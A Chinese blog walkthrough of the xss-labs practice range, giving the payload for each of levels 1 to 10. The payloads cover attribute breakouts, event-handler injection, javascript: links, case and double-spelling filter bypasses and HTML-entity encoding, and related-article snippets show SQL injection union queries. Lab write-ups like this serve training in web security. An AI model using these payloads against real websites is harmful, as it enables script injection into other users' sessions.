首页 > 其他分享 >xss-labs靶场通关攻略

xss-labs靶场通关攻略

时间:2024-08-26 19:52:04浏览次数:9  
标签:xss alert labs 输入框 &# 97 攻略 源代码 输入

第一关

我们来到第一关发现什么提示也没有试着输一个<script>alert()</script>

第一关还是简单的直接输入就可以了

第二关

一,我们尝试在搜索框输入<script>alert()</script>发现没有成功

二,查看一下源代码

输入的<script>alert()</script>在<input>标签的value中,需要">闭合

三,搜索框输入"><script>alert()</script>

结果很不错,我们也通过了第二关

第三关

一,首先输入<script>alert()</script>尝试一下看看行不行

emmmm,差点意思

二,查看一下源代码

发现符号被实体化了

三,输入框输入' a'> οnclick='alert(1)',再点击输入框

第四关

一,我们还是尝试输入<script>alert()</script>

二,查看一下源代码

发现符号也被实体化了

三,输入框输入"οnclick="alert(1),再点击输入框(双引号闭合)

第五关

一,我们尝试输入" οnfοcus=javascript:alert() "

二,查看一下源代码

三,发现对事件on做了过滤,在他们中间加了_,尝试用a标签的href 属性来构造payload,输入"><a href='javascript:alert(123);'>点击我</a>,点击"  ">  "

第六关

一,先输入" οnfοcus=javascript:alert() "尝试,查看源代码

,尝试用onfocus <script> <a href=javascript:alert()>

三,尝试大小写绕过OnFocus <sCriPt> <a hReF=javascript:alert()>

四,发现大小写没有被过滤掉,这题能利用大小写进行绕过,所以我们可以用下面的方法,构造payload

"> <a hRef=javascript:alert()>1</a> <"

点击一

第七关

一,输入关键字" OnFocus <sCriPt> <a hReF=javascript:alert()>,查看网页源代码

传进去的值,经过转化后变成了

" focus <> <a =java:alert()>

二,采用双拼写绕过"><scscriptript>alert()</scscriptript>

第八关

一,输入javascript:alert()查看网页源码

二,用Unicode编码解码编码绕过&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#106;&#97;&#100;&#101;&#110;&#34;&#41;

三,输入步骤二点击友情链接

第九关

一,输入javascript:alert()查看网页源码

二,用Unicode编码解码编码绕过

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

三,输入步骤二点击友情链接

第十关

一,发现没有输入框,通过F12查看网页源码

发现有三个隐藏的标签,没有输入的地方,就在URL中,尝试将隐藏标签显示出来

二,在搜索栏输入&t_sort=111" οnclick=javascript:alert() type="text"

三,点击一下输入框,成功

标签:xss,alert,labs,输入框,&#,97,攻略,源代码,输入
From: https://blog.csdn.net/2301_81881972/article/details/141534193

相关文章

  • sqli-labs靶场通关攻略 31-35
    主页有sqli-labs靶场通关攻略1-30第三一关less-31闭合方式为?id=1&id=1")--+步骤一:查看数据库名http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%201,database(),3%20--+ 步骤二:查看表名http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%2......
  • MSSQL SQLi Labs 手工注入靶场
    less-1步骤一:判断注入方式 ?id=1'--+步骤二:判断后台是否是MYSQL数据库?id=1'andexists(select*fromsysobjects)--+步骤三:查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限?id=-1'unionselect1,user,is_srvrolemember('public');-......
  • sqli-labs靶场通关攻略(31-35关)
    第31关(")闭合)查数据库?id=")unionselect1,2,database()--+查表?id=")unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema='security'--+查列?id=")unionselect1,2,group_concat(column_nam......
  • 一文掌握:HTML标签使用全攻略,打造完美网页布局!
    HTML(超文本标记语言)是构建网页的基石。通过不同的标签,HTML定义了网页的结构和内容。了解各种HTML标签的用法是前端开发的基础。本文将回顾HTML中常见标签的用法,并介绍它们在实际开发中的应用。一、结构性标签<!DOCTYPEhtml>这个标签声明文档类型,并指定HTML5标准。它应......
  • 安许续期遭拒,河南企业申诉材料撰写攻略
    当河南企业的安全生产许可证(安许)续期申请遭拒时,撰写申诉材料是一项重要且复杂的任务。以下是一份详细的申诉材料撰写攻略,旨在帮助企业高效、准确地准备申诉材料,提高申诉成功率。一、明确申诉理由首先,企业需要明确安许续期遭拒的具体原因。这通常会在官方的拒绝通知中明确列出......
  • 图像降噪神器:低通滤波技术的全面攻略
    今天我们来聊聊图像处理中的一个重要工具——低通滤波。通过理解低通滤波的原理和应用,我们可以更好地掌控图像质量,使得视觉效果更符合我们的预期。我会介绍低通滤波的多种类型、工作原理、具体应用场景及其优缺点,并结合实际案例进行详细分析。0 定义低通滤波(Low-PassFilte......
  • sqli-labs靶场通关攻略(20-40)
    第二十一关登陆后显示如下图界面,感觉和cookie注入有些相似进行抓包,发现cookie被编码返回来查看源代码,发现这里被base64编码我们将抓到的包发至重放器,在cookie字段写入查询代码并改为base64编码发送请求即可得到数据库名剩余操作大家自行查询第二十二关登陆后显示......
  • 中国平安25届校招测评题库:平安IQ新、16PF测评真题题库及高分攻略
      平安IQ测评答题指南 答题要求题量与时间:30题,限时57分钟。题型:单选题,每题60~120秒。注意事项:不可逆作答,全屏显示,避免中途退出或切换网页,准备计算器或草稿纸,确保网络稳定和电量充足。答题建议最佳答题时间:20~40分钟。答题策略:满分答案建议错2~3......
  • Mercari电商实战指南:开店、运营、防封一站式攻略
    Mercari作为一个全球性的二手商品交易平台,为卖家提供了广阔的销售渠道。然而,如何在Mercari上成功开店并避免店铺被封,是每一位卖家都需要深入了解和掌握的技能。本文将从开店准备、店铺运营到防封策略三个方面,为卖家提供全流程的解析。一、Mercari开店准备1、准备资料注册时......
  • 【前端入门】HTML5全攻略
    HTML概述HTML指的是超文本标记语言,它是用来描述网页的一种语言。HTML不是一种编程语言,而是一种标记语言。标记语言是一套标记标签。Web标准是由W3C组织和其他标准化组织制定的一系列标准的集合。W3C(万维网联盟)是由国际最著名的标准化组织。Web标准的构成(重点)主要包括......